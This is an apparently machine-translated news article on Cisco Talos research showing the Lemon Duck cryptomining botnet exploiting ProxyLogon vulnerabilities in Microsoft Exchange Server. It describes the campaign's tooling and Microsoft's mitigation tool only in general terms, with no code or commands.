The Cisco Talos intelligence group has discovered an attack that could be taking advantage of weaknesses in Windows Exchange Server since last April. Lemon Duck, which is a botnet that had already been discovered in March taking advantage of vulnerable servers and using these systems to mine cryptocurrencies (a technique also known as cryptojacking).
If we focus on this latest attack that targets Windows Exchange Server vulnerabilities, Cisco Talos explains that in its discoveries found that Lemon Duck was taking advantage of zero-day vulnerabilities (also known by its name in English: exploit of zero-day) of Microsoft Exchange Server and that this represents a security disaster for thousands of organizations.
Four critical failures, called ProxyLogon, they affect Microsoft Exchange Server 2013, 2016 and 2010. Patches, vulnerability detection tools and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised.
Cryptocurrency mining through glitches
Cisco Talos has discovered that Lemon Duck has been able to exploit bugs discovered in March, even in April. Lemon Duck operators are reportedly adding new tools to "maximize the effectiveness of their campaigns" by targeting high-severity vulnerabilities in Microsoft Exchange Server and telemetry data tracked by DNS queries to Lemon Duck domains indicate that campaign activity soared in April.
Most of the inquiries came from the United States, followed by Europe and Southeast Asia. Lemon Duck operators use automated tools to scan, detect and exploit servers before payloads such as DNS Cobalt Strike and web shells take place, which lead to the execution of cryptocurrency mining software and additional malware.
As reported by ZDnet, the malware and associated PowerShell scripts also will try to remove antivirus products offered by vendors such as ESET and Kaspersky and they will stop any services - including Windows Update and Windows Defender - that could hinder an infection attempt.
In these recent campaigns, the CertUtil command line program is used to download two new PowerShell scripts that handle AV product removal, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.
Taking advantage of the issues that Exchange Server reported in March
After several Microsoft Exchange Server zero-day vulnerabilities were made public on March 2, Cisco Talos and Other security researchers began looking at various threat actors, including Lemon Duck, taking advantage of these vulnerabilities. for its initial exploitation.
According to initial information, a group of hackers from China, Hafnium, was attacking servers in different countries of the world through this software from the Redmond brand. This campaign affected Exchange Server between its versions 2013 to 2019.
Later in late March, Microsoft said that the Lemon Duck botnet had been observed exploiting vulnerable servers and using the systems to mine cryptocurrencies.
A solution from Redmond that seems to have been insufficient
To deal with this attack on its Exchange Server, Microsoft launched in mid-March a one-click local mitigation tool for Microsoft Exchange Server, which means that companies using Exchange services can install updates released by the company "in a single click".
In this way, IT administrators in enterprise environments can use the new security patches of the Redmond firm with a simple installation to all the computers of the entity. It was not presented as a final solution, but a way to mitigate the possible impact of this attack while applying the update with the patches.